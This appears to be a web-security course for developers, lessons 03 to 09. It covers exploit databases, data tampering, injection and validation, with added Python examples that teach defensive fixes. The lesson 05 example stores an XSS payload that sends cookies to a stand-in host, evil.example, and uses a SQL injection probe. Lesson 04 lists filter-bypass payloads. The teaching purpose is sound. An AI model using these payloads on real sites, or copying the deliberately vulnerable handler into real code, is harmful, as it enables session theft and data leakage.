Security for Web Developers: 09: Exploits

Security Exploits

Which Exploits Will You Meet: Known or Unknown?

Unless you are a high-value target, your site will mostly be attacked with known, old exploits. That is no comfort: you still have to defend against every one of them, and with that many being tried against you, the odds that one of them works are far too high.

Fortunately, rigorous and repeated auditing (knowing exactly what you run, checking it against the public exploit databases, and patching) can give you real confidence that your site is protected against the known threats. It cannot make you certain, and it does nothing against the unknown ones, but it takes you off the easy-target list.

Assignment: Look up your web application’s exploits at the Exploit Database
https://www.exploit-db.com/

Search against:

  • Your web server’s OS and version (Linux, Unix, Windows, Mac, e.g. Ubuntu Linux 14.04, Windows Server 2012, etc.)
  • Your web daemon software and version (Apache, IIS, Nginx, by version)
  • Your web language, framework, platform and version (PHP, Python, Java; CodeIgniter or J2EE; WordPress, Joomla! or Moodle, again by version)
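
The three searches above start from the product and version strings your site advertises, and an attacker starts from exactly the same strings. The script below is an added example, not part of the original lesson: it pulls those strings out of a response the way a scanner would, so you can see what you are leaking before you search. The headers and HTML in it are constructed to look like a typical Ubuntu/Apache/PHP/WordPress host; nothing is captured from a real site.

```python
"""Inventory the product/version strings a site leaks, the same strings an
attacker (or you) would feed to an Exploit-DB search.

Added example, not part of the original lesson. SAMPLE_HEADERS and SAMPLE_BODY
are constructed; for a real host use `curl -sI https://your.site` for the
headers and `curl -s https://your.site` for the HTML.
"""
import re

# Constructed sample response (not captured from any real host).
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.18 (Ubuntu) OpenSSL/1.0.2g",
    "X-Powered-By": "PHP/7.0.33",
    "Content-Type": "text/html; charset=UTF-8",
}
SAMPLE_BODY = """<html><head>
<meta name="generator" content="WordPress 4.9.8" />
<link rel="stylesheet" href="/wp-content/themes/x/style.css?ver=4.9.8">
</head><body>hello</body></html>"""

# "Product/1.2.3" tokens, as found in Server and X-Powered-By headers.
TOKEN_RE = re.compile(r"([A-Za-z][\w.+-]*)/(\d+(?:\.\d+)+[a-z]?)")
# "(Ubuntu)", "(Win64)" and similar OS hints inside the Server header.
OS_RE = re.compile(r"\(([A-Za-z][\w ]*)\)")
# <meta name="generator" content="WordPress 4.9.8">
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)


def fingerprints(headers, body):
    """Return an ordered, de-duplicated list of (product, version) pairs.

    Version is "" when only a product name is visible (an OS hint); that is
    still worth recording, since it narrows the OS column of the assignment.
    """
    found = []
    for name in ("Server", "X-Powered-By"):
        value = headers.get(name, "")
        found.extend(TOKEN_RE.findall(value))
        if name == "Server":
            found.extend((os_name, "") for os_name in OS_RE.findall(value))
    # IIS advertises the .NET version in its own header, without a product prefix.
    if headers.get("X-AspNet-Version"):
        found.append(("ASP.NET", headers["X-AspNet-Version"]))
    for content in GENERATOR_RE.findall(body):
        parts = content.split()
        if len(parts) >= 2 and parts[-1][0].isdigit():
            found.append((" ".join(parts[:-1]), parts[-1]))
        else:
            found.append((content, ""))
    return list(dict.fromkeys(found))   # de-duplicate, preserving order


def search_terms(pairs):
    """Fingerprints as the query strings to type into Exploit-DB or `searchsploit`."""
    return [f"{product} {version}".strip() for product, version in pairs]


if __name__ == "__main__":
    for term in search_terms(fingerprints(SAMPLE_HEADERS, SAMPLE_BODY)):
        print(term)
```

Each printed term ("Apache 2.4.18", "PHP 7.0.33", "WordPress 4.9.8", ...) is a search on exploit-db.com, or an argument to searchsploit, the offline copy of the same database. Two caveats: turning the banners off (ServerTokens Prod in Apache, expose_php = Off in php.ini) removes the easy lookup but not the vulnerability, and a missing banner just means the attacker fingerprints you another way, so patch the version rather than hide it.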

Security for Web Developers: 08: What Can Hurt You

Script Kiddies

What You Know Can Hurt You. What You Don’t Know Can Hurt You.

Most so-called hackers are really just script kiddies:
http://www.hackpconline.com/2010/05/painfully-computer-pranks.html.

Most of the fruit is low-hanging:
https://www.toptal.com/security/10-most-common-web-security-vulnerabilities.

Real exploit developers who find real vulns go much deeper:
http://blog.dewhurstsecurity.com/2013/04/17/http-form-password-brute-forcing-the-need-for-speed.html.

Public and private groups share information about newly discovered vulnerabilities and exploits, though not to an equal degree. A “zero day” is one the vendor has had zero days’ notice of: no patch exists yet, so whoever holds it can use it against anyone running the affected software.

The most wicked exploits are saved for the highest-value targets and demonstrate vast knowledge and skill, for example Stuxnet:
http://arstechnica.com/tech-policy/2012/06/confirmed-us-israel-created-stuxnet-lost-control-of-it/.

Part of your risk equation is a realistic estimate of how valuable, or how controversial, what your site holds really is.

Security for Web Developers: 07: Tamper Data

Security Testing With Tamper Data

Tamper Data

Here’s a more sophisticated tutorial:

[embedded video]

Assignment: Test your site security

Install Tamper Data in Firefox on a suitable computer. (The classic Tamper Data add-on stopped working with Firefox 57; on a current browser the Network panel of the developer tools, with “Edit and Resend”, or an intercepting proxy such as Burp Suite or OWASP ZAP does the same job.) Now visit your site and find what you can tamper with. Pay particular attention to pages with forms, especially if you use hidden fields: anything the browser sends back, the user can change.

You can also try it out on Hack This Site (https://www.hackthissite.org/pages/index/index.php), or on your own testing sites like DVWA (http://www.dvwa.co.uk/) or Mutillidae (https://sourceforge.net/projects/mutillidae/).

Here’s what attackers try once a filter is in their way, the OWASP XSS Filter Evasion Cheat Sheet:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.

Security for Web Developers: 06: Security on Your Site

Site Security

Users cause your server to run code (hopefully your code, and only your code) whenever they:

  • Load any “active” page (.php, .py, .asp etc.)
  • Fill out forms
  • Search
  • Buy something
  • Create an account
  • Log in to an account

If you wrote the code, you know all too well that you’re letting visitors run it. If the site uses a database, users are touching it, directly or indirectly. What goes into the database, and what comes back out of it onto your pages, is entirely your responsibility. Consider cross-site scripting, for instance: do you know how to prevent or detect it?

Tamper Data is a simple tool for (you guessed it) tampering with the data your browser sends to a web server (and vice-versa). Here’s an outdated example for the sake of simplicity:

[embedded video]

This exploit won’t work in most places any more, but it’s a good illustration of how and why people will tamper with whatever your site trusts the browser to send back: hidden form fields, cookies, URL parameters.
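
The hidden-field case from the Tamper Data assignment in lesson 07, and the tampering described above, come down to one rule: a value that leaves the server and comes back from the browser is attacker input. The code below is an added example, not part of the original lesson, showing the server-side fix: sign the hidden fields before rendering and verify the signature on submit. The secret key, the form fields and the POST bodies are constructed for the demo; render_form and verify_submission stand in for your page and form-handler code.

```python
"""Hidden form fields come back from the browser, so they are attacker input.
Sign them before sending and verify on submit, or the 'price' the user posts
back is whatever Tamper Data set it to.

Added example, not part of the original lesson. SECRET_KEY, the field names and
the demo values are constructed.
"""
import hashlib
import hmac
import html

# Constructed demo key. In a real app load it from configuration, never from source.
SECRET_KEY = b"demo-only-secret-key-0123456789"
SIGNED_FIELDS = ("item", "price")


def sign_fields(fields, key=SECRET_KEY):
    """HMAC-SHA256 over the signed fields in a canonical, unambiguous encoding.

    Each name and value is length-prefixed, so "a=bc" and "ab=c" cannot
    produce the same MAC; sorting makes field order irrelevant.
    """
    mac = hmac.new(key, digestmod=hashlib.sha256)
    for name in sorted(fields):
        for part in (name, str(fields[name])):
            data = part.encode("utf-8")
            mac.update(len(data).to_bytes(4, "big") + data)
    return mac.hexdigest()


def render_form(fields, key=SECRET_KEY):
    """The hidden inputs the browser receives, plus the signature over them."""
    lines = [
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(str(v), quote=True)}">'
        for k, v in fields.items()
    ]
    lines.append(f'<input type="hidden" name="sig" value="{sign_fields(fields, key)}">')
    return "\n".join(lines)


def verify_submission(post, key=SECRET_KEY, signed=SIGNED_FIELDS):
    """True only if the signed fields came back exactly as rendered.

    Missing fields or a missing signature fail closed. compare_digest keeps
    the comparison constant-time so the MAC cannot be guessed byte by byte.
    """
    try:
        fields = {name: post[name] for name in signed}
        sig = post["sig"]
    except KeyError:
        return False
    return hmac.compare_digest(sign_fields(fields, key), sig)


if __name__ == "__main__":
    rendered = {"item": "SKU-1001", "price": "49.99"}
    print(render_form(rendered))
    honest = dict(rendered, sig=sign_fields(rendered))
    tampered = dict(honest, price="0.01")    # edited in transit with Tamper Data
    print(verify_submission(honest), verify_submission(tampered))   # True False
```

Better still, do not round-trip the price at all: send only the item ID and look the price up server-side. Signing is for state you genuinely must bounce through the browser (a multi-step form, say), and on its own it does not stop someone replaying an old, validly signed form; bind the signature to a user ID or an expiry as well if that matters.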

Security for Web Developers: 05: Security on the Server Side

Server Security

Your server, your database and your site’s security

  • Do you host your own site, or is it hosted?
  • How many sites are hosted on the same server as yours?
  • What programming languages and platforms does it support?
  • How many open ports and opportunities for interaction does it offer? (Check with ss -tlnp on the host and with an nmap scan from outside; every listening service is something an attacker can talk to.)

A lot depends on handling input from the client properly before it reaches your server-side code and database: validate it on the way in, and encode it on the way out. Different languages have different techniques (Perl’s “taint” mode, for example, refuses to use externally supplied data in dangerous operations until your code has explicitly checked it), but if you fail to use them your site can be vulnerable to injection flaws: SQL injection where the input reaches a query, and Cross-Site Scripting (XSS) where it reaches a page.
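
The question lesson 06 asks (do you know how to prevent XSS?) and the point above have the same answer, and it is easiest to see in code. The following is an added example, not code from the original lesson: one profile-page handler written the vulnerable way (string-built SQL, raw output) beside the hardened way (bound parameters, output encoding). The in-memory user table, the stored payload and the probe string are constructed.

```python
"""Client input reaching a SQL query and an HTML page: the vulnerable handler
beside the hardened one.

Added example, not code from the original lesson. make_db() builds a
constructed table; the four lookup/render functions stand in for a handler.
"""
import html
import sqlite3


def make_db():
    """Constructed table: bob's bio is a stored-XSS payload that got past input checks."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, bio TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [
        ("alice", "likes cats & dogs"),
        ("bob", "<script>fetch('//evil.example/?c='+document.cookie)</script>"),
    ])
    return db


def lookup_vulnerable(db, name):
    """Builds the SQL by string formatting: NAME can rewrite the query (SQL injection)."""
    return db.execute(f"SELECT name, bio FROM users WHERE name = '{name}'").fetchall()


def lookup_safe(db, name):
    """Binds NAME as a parameter: the driver never lets it become SQL."""
    return db.execute("SELECT name, bio FROM users WHERE name = ?", (name,)).fetchall()


def render_vulnerable(rows):
    """Interpolates the bio raw, so bob's stored script runs in every visitor's browser."""
    return "".join(f"<p><b>{n}</b>: {b}</p>" for n, b in rows)


def render_safe(rows):
    """Encodes at output, for the HTML-body context: < > & " ' become entities."""
    return "".join(f"<p><b>{html.escape(n)}</b>: {html.escape(b)}</p>" for n, b in rows)


def demo():
    """(rows leaked by injection, rows with binding, live script in unsafe HTML, in safe HTML)."""
    db = make_db()
    probe = "x' OR '1'='1"          # classic tautology: matches every row
    leaked = lookup_vulnerable(db, probe)
    bound = lookup_safe(db, probe)
    bob = lookup_safe(db, "bob")
    return (len(leaked), len(bound),
            "<script>" in render_vulnerable(bob),
            "<script>" in render_safe(bob))


if __name__ == "__main__":
    print(demo())   # (2, 0, True, False)
```

Note that the vulnerable query does not raise an error; it just returns every row, which is why this class of bug survives testing. html.escape is correct for text inside an HTML element; a value going into an attribute, a script block or a URL needs that context’s encoder, which is why a template engine with auto-escaping on (Jinja2 in Flask, for .html templates) is the practical answer rather than hand-escaping.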

Assignment: XSS Me

Watch this video, install this Firefox add-on and unleash it on your own site or your test sites. (XSS Me is a legacy add-on that no longer installs on Firefox 57 and later; an intercepting proxy with an active scanner, such as OWASP ZAP, covers the same ground on a current browser.)

[embedded video]

Security for Web Developers: 04: Risk Factors

Internet Security Threats

Your site will be tested if:

  • It holds anything of value,
  • It attracts lots of attention (sorry) or
  • It’s controversial in any way.

The software you’ve written (your own code) critically depends on your knowledge of things like validating and “sanitizing” the data users send, and on not confusing the two: validation rejects anything that isn’t what you expect, while sanitizing tries to clean it up and is easy to get wrong. See https://code.tutsplus.com/tutorials/sanitize-and-validate-data-with-php-filters--net-2595.
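
The difference matters because strip-based “sanitizers” are exactly what the XSS Filter Evasion Cheat Sheet linked in lesson 07 exists to defeat, whereas an allow-list has nothing to evade. The code below is an added example, not from the original lesson or the linked tutorial: a naive tag-stripping sanitizer with three constructed payloads that get past it, beside a validating form handler modelled on the PHP filter approach. The field rules (username, age) and the sign-up form are constructed for the demo.

```python
"""Sanitizing (stripping the bad bits) versus validating (accepting only what
you expect). Added example, not code from the original lesson; the field
rules and the payloads are constructed.
"""
import re

# Three constructed payloads in the spirit of the OWASP filter-evasion sheet.
BYPASSES = [
    "<SCRIPT>alert(1)</SCRIPT>",                       # case differs from the filter
    "<scr<script>ipt>alert(1)</scr</script>ipt>",     # stripping the inner tag rebuilds the outer one
    "<img src=x onerror=alert(1)>",                     # no script tag needed at all
]


def strip_script_tags(text):
    """A home-grown 'sanitizer': remove <script> tags, keep the rest. Do not use."""
    return text.replace("<script>", "").replace("</script>", "")


def demo_bypasses():
    """What the sanitizer lets through for each payload: still live HTML in every case."""
    return [strip_script_tags(p) for p in BYPASSES]


def validate_username(text):
    """Allow-list: 3 to 20 characters from [A-Za-z0-9_]; returns the value or None."""
    return text if re.fullmatch(r"[A-Za-z0-9_]{3,20}", text) else None


def validate_age(text):
    """Type and range check (the FILTER_VALIDATE_INT idea); returns an int or None."""
    if not re.fullmatch(r"\d{1,3}", text):
        return None
    age = int(text)
    return age if 0 <= age <= 150 else None


def validate_signup(post):
    """Validate a constructed sign-up form.

    Returns (clean, errors). On any error `clean` is empty, so nothing
    half-checked reaches the database; a bad username is rejected outright,
    never 'cleaned' into something else.
    """
    errors = []
    username = validate_username(post.get("username", ""))
    if username is None:
        errors.append("username: 3-20 letters, digits or underscores")
    age = validate_age(post.get("age", ""))
    if age is None:
        errors.append("age: whole number between 0 and 150")
    clean = {} if errors else {"username": username, "age": age}
    return clean, errors


if __name__ == "__main__":
    for payload, result in zip(BYPASSES, demo_bypasses()):
        print(repr(payload), "->", repr(result))
    print(validate_signup({"username": "alice_01", "age": "34"}))
    print(validate_signup({"username": "<script>", "age": "abc"}))
```

The second payload is the instructive one: removing the inner “<script>” turns “<scr…ipt>” into a working tag, so a single-pass strip makes the input more dangerous, not less. Validation has no such failure mode, but it only covers fields with a known shape; free text (a bio, a comment) cannot be validated this way and must be encoded at output instead.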

The platform you’ve built on, whether high-level like WordPress or much lower-level like CodeIgniter, will have its own security issues and require monitoring and patching.

And the same interactivity that attracts users and builds your following dramatically increases your risk.

The risk isn’t just yours: your users are taking a risk trusting you with any information, and simply by coming to your site. Injected code, for instance, can both steal data and infect visitors’ computers.

Security for Web Developers: 03: What Makes Your Website Insecure?

Web security network

Your relative security is:

  • Lower if your site uses WordPress,
  • Lower if your site involves any controversial topic,
  • Lower if you store credit card or identity information,
  • Lower if your site has a login form,
  • Lower if your servers, applications and code are old or highly complex and
  • Lower if they are run by underfunded or outsourced IT.
